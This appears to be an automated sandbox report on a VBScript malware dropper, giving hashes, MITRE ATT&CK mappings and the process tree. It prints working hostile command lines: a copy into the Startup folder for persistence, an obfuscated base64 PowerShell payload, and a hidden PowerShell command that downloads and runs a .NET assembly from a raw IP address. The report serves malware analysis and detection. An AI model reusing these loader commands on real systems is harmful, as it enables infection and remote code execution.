2a196da9c5e2dcf30d7eb90464a4296bc1f0046958836157c07ab4782e5af108

General

Target

9fb660eca8d9ed1038a8cffc032e59bb.vbs
Size

151KB
MD5

9fb660eca8d9ed1038a8cffc032e59bb
SHA1

4aff5b55b1b499cec665f46b132856a4a300b4e9
SHA256

2a196da9c5e2dcf30d7eb90464a4296bc1f0046958836157c07ab4782e5af108
SHA512

0bcb0de54a3bdbe9d0e2be1899ab05060a7db58ae6e53aeed82a54b99f126502e0366415e590f22909aa9531c272af8287c6d5f06ece31de21156bcc2ef81790

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://91.241.19.49/ramdes/DownloaderF3.txt

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

4 1216 powershell.exe

flow	pid	process
4	1216	powershell.exe

Drops startup file 2 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ OID.vbs	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ OID.vbs	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

764 PING.EXE
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

1364 powershell.exe
1124 powershell.exe
1216 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1364 powershell.exe
Token: SeDebugPrivilege 1124 powershell.exe
Token: SeDebugPrivilege 1216 powershell.exe

pid	process
764	PING.EXE

pid	process
1364	powershell.exe
1124	powershell.exe
1216	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1364	powershell.exe
Token: SeDebugPrivilege	1124	powershell.exe
Token: SeDebugPrivilege	1216	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

WScript.execmd.exepowershell.exe

description	pid	process	target process
PID 1596 wrote to memory of 1148	1596	WScript.exe	cmd.exe
PID 1596 wrote to memory of 1148	1596	WScript.exe	cmd.exe
PID 1596 wrote to memory of 1148	1596	WScript.exe	cmd.exe
PID 1148 wrote to memory of 764	1148	cmd.exe	PING.EXE
PID 1148 wrote to memory of 764	1148	cmd.exe	PING.EXE
PID 1148 wrote to memory of 764	1148	cmd.exe	PING.EXE
PID 1148 wrote to memory of 1364	1148	cmd.exe	powershell.exe
PID 1148 wrote to memory of 1364	1148	cmd.exe	powershell.exe
PID 1148 wrote to memory of 1364	1148	cmd.exe	powershell.exe
PID 1596 wrote to memory of 1124	1596	WScript.exe	powershell.exe
PID 1596 wrote to memory of 1124	1596	WScript.exe	powershell.exe
PID 1596 wrote to memory of 1124	1596	WScript.exe	powershell.exe
PID 1124 wrote to memory of 1216	1124	powershell.exe	powershell.exe
PID 1124 wrote to memory of 1216	1124	powershell.exe	powershell.exe
PID 1124 wrote to memory of 1216	1124	powershell.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9fb660eca8d9ed1038a8cffc032e59bb.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1596

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\9fb660eca8d9ed1038a8cffc032e59bb.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ OID.vbs')
2⤵
- Suspicious use of WriteProcessMemory
PID:1148

C:\Windows\system32\PING.EXE
ping 127.0.0.1 -n 10
3⤵
- Runs ping.exe
PID:764

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\9fb660eca8d9ed1038a8cffc032e59bb.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ OID.vbs')
3⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1364

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC☙Hk☙d☙Bl☙Fs☙XQBd☙C☙☙J☙BE☙Ew☙T☙☙g☙D0☙I☙Bb☙FM☙eQBz☙HQ☙ZQBt☙C4☙QwBv☙G4☙dgBl☙HI☙d☙Bd☙Do☙OgBG☙HI☙bwBt☙EI☙YQBz☙GU☙Ng☙0☙FM☙d☙By☙Gk☙bgBn☙Cg☙K☙BO☙GU☙dw☙t☙E8☙YgBq☙GU☙YwB0☙C☙☙TgBl☙HQ☙LgBX☙GU☙YgBD☙Gw☙aQBl☙G4☙d☙☙p☙C4☙R☙Bv☙Hc☙bgBs☙G8☙YQBk☙FM☙d☙By☙Gk☙bgBn☙Cg☙JwBo☙HQ☙d☙Bw☙Do☙Lw☙v☙Dk☙MQ☙u☙DI☙N☙☙x☙C4☙MQ☙5☙C4☙N☙☙5☙C8☙cgBh☙G0☙Z☙Bl☙HM☙LwBE☙G8☙dwBu☙Gw☙bwBh☙GQ☙ZQBy☙EY☙Mw☙u☙HQ☙e☙B0☙Cc☙KQ☙p☙Ds☙WwBT☙Hk☙cwB0☙GU☙bQ☙u☙EE☙c☙Bw☙EQ☙bwBt☙GE☙aQBu☙F0☙Og☙6☙EM☙dQBy☙HI☙ZQBu☙HQ☙R☙Bv☙G0☙YQBp☙G4☙LgBM☙G8☙YQBk☙Cg☙J☙BE☙Ew☙T☙☙p☙C4☙RwBl☙HQ☙V☙B5☙H☙☙ZQ☙o☙Cc☙QwBs☙GE☙cwBz☙Ew☙aQBi☙HI☙YQBy☙Hk☙Mw☙u☙EM☙b☙Bh☙HM☙cw☙x☙Cc☙KQ☙u☙Ec☙ZQB0☙E0☙ZQB0☙Gg☙bwBk☙Cg☙JwBS☙HU☙bg☙n☙Ck☙LgBJ☙G4☙dgBv☙Gs☙ZQ☙o☙CQ☙bgB1☙Gw☙b☙☙s☙C☙☙WwBv☙GI☙agBl☙GM☙d☙Bb☙F0☙XQ☙g☙Cg☙JwB0☙Hg☙d☙☙u☙DQ☙cwBu☙C8☙d☙Bz☙GU☙d☙☙v☙Dk☙N☙☙u☙Dk☙MQ☙u☙DE☙N☙☙y☙C4☙MQ☙5☙C8☙Lw☙6☙H☙☙d☙B0☙Gg☙Jw☙p☙Ck☙';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('☙','A') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1124

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/ramdes/DownloaderF3.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.4sn/tset/94.91.142.19//:ptth'))"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1216

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Remote System Discovery

1

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
675a290a7eb9bdde78d257a2a9c89d56

SHA1
1a950c89cddccbabfeda0974400977871feda219

SHA256
6230cf1d410c04b2067152c53ceabd324b0b7a67bdc1b47bc64b321b0d5719be

SHA512
125c8b941fd157a25245e854f6e265ba22b1bf0ecb55f99f9de05228d1143b5f50489ec70d949ce624e23f277e1f827329c4c4402b09a2c22e728dcb8140438f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
675a290a7eb9bdde78d257a2a9c89d56

SHA1
1a950c89cddccbabfeda0974400977871feda219

SHA256
6230cf1d410c04b2067152c53ceabd324b0b7a67bdc1b47bc64b321b0d5719be

SHA512
125c8b941fd157a25245e854f6e265ba22b1bf0ecb55f99f9de05228d1143b5f50489ec70d949ce624e23f277e1f827329c4c4402b09a2c22e728dcb8140438f

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/764-57-0x0000000000000000-mapping.dmp

Download
memory/1124-69-0x00000000026D0000-0x00000000026D2000-memory.dmp

Filesize
8KB

Download
memory/1124-77-0x00000000026DB000-0x00000000026FA000-memory.dmp

Filesize
124KB

Download
memory/1124-70-0x00000000026D2000-0x00000000026D4000-memory.dmp

Filesize
8KB

Download
memory/1124-71-0x00000000026D4000-0x00000000026D7000-memory.dmp

Filesize
12KB

Download
memory/1124-64-0x0000000000000000-mapping.dmp

Download
memory/1124-67-0x000007FEF2DE0000-0x000007FEF393D000-memory.dmp

Filesize
11.4MB

Download
memory/1148-56-0x0000000000000000-mapping.dmp

Download
memory/1216-76-0x000007FEF2DE0000-0x000007FEF393D000-memory.dmp

Filesize
11.4MB

Download
memory/1216-79-0x00000000027D2000-0x00000000027D4000-memory.dmp

Filesize
8KB

Download
memory/1216-82-0x00000000027DB000-0x00000000027FA000-memory.dmp

Filesize
124KB

Download
memory/1216-81-0x000000001B780000-0x000000001BA7F000-memory.dmp

Filesize
3.0MB

Download
memory/1216-72-0x0000000000000000-mapping.dmp

Download
memory/1216-80-0x00000000027D4000-0x00000000027D7000-memory.dmp

Filesize
12KB

Download
memory/1216-78-0x00000000027D0000-0x00000000027D2000-memory.dmp

Filesize
8KB

Download
memory/1364-58-0x0000000000000000-mapping.dmp

Download
memory/1364-60-0x0000000001E70000-0x0000000001E72000-memory.dmp

Filesize
8KB

Download
memory/1364-68-0x0000000001E7B000-0x0000000001E9A000-memory.dmp

Filesize
124KB

Download
memory/1364-62-0x0000000001E72000-0x0000000001E74000-memory.dmp

Filesize
8KB

Download
memory/1364-63-0x0000000001E74000-0x0000000001E77000-memory.dmp

Filesize
12KB

Download
memory/1364-61-0x000007FEF3780000-0x000007FEF42DD000-memory.dmp

Filesize
11.4MB

Download
memory/1596-55-0x000007FEFC371000-0x000007FEFC373000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing